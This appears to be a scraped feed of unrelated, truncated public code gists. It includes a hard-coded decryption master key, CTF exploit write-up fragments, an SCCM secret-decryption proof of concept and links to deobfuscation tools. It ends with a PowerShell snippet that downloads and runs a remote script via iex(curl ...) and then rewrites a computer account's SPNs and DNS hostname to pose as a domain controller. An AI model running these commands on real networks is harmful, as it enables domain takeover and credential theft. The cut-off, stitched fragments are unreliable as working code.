rqu1

from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests

DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

class PanCrypt():

d0now

• My first time firefox js exploit
• Not a intended way, but I was fast (first blood)

lgg

https://gist.github.com/mate-h/fc8f21bd3ce9e3ad1737b85f795bab07

https://github.com/venaxyt/mysterium

---

https://github.com/u0pattern/PyArmor-Deobfuscator

https://github.com/Kechinator/unpyarmor

DavidBuchanan314

import os
import sys

"""
This (pure!) python script streams a gzip-compressed YUV4MPEG video to stdout.
It easily runs at 1080p60fps on my machine.

Pipe it into a media player like this:

python3 gzip_swar_life.py | mbuffer | gunzip - | mpv -

pzread

Google CTF 2022 Pwn d8 Author's Write-up

This year I made the pwn challenge "d8" in Google CTF 2022. d8 allows you to upload and run a piece of v8 code cache. The goal is crafting the code cache to achieve arbitrary code execution.

v8 code cache is a format to serialize the v8 heap and can be deserialized back to the v8 heap. This improves the JS loading time when the same piece of code is reused.

The format of v8 code cache is quite interesting. It doesn't directly serialize the v8 objects in the heap, but uses a bytecode to describe how to reconstruct those v8 objects. There is a series of blog posts by PT SWARM about how it works and it's definitely worth to read.

When studying the v8 code cache, I realized there is neither the boundary check in the deserializer, nor a validator to verify if the constructed v8 objects are legal, which

hgarrereyn

# Author: hgarrereyn
# Desc: Lifter solution for GoogleCTF 2022 eldar

import lief
from collections import namedtuple
from dataclasses import dataclass
from typing import Any
from capstone import *
from z3 import *
import numpy as np

xpn

// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.

using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;

namespace SCCMDecryptPOC
{
    internal class Program

janoglezcampos

#include <windows.h>
#include <stdio.h>
#include <psapi.h>

typedef char * (*ParseHeaders)(LPCSTR, int *);

BOOL bCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)
{
    for (; *szMask; ++szMask, ++pData, ++bMask)
        if (*szMask == 'x' && *pData != *bMask)  

NyaMisty

#*TEMPLATE*
#*TEMPLATE* Rename or copy this file without the .TEMPLATE extension
#*TEMPLATE*
#------------------------------------------------------------------------------
# JEB Custom Keyboard Shortcuts
#------------------------------------------------------------------------------

# Uncomment and add your own keyboard shortcuts for the actions for which you'd like to override the default shortcuts
# Example: by default, Jump is mapped to the 'G' key; the following line (minus the # character) can be used to remap the action to CTRL+J:
#jump=Ctrl+J

Wh04m1001

iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )

Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose

#in my testing i had to set dnshostname to $null first

Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null

Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local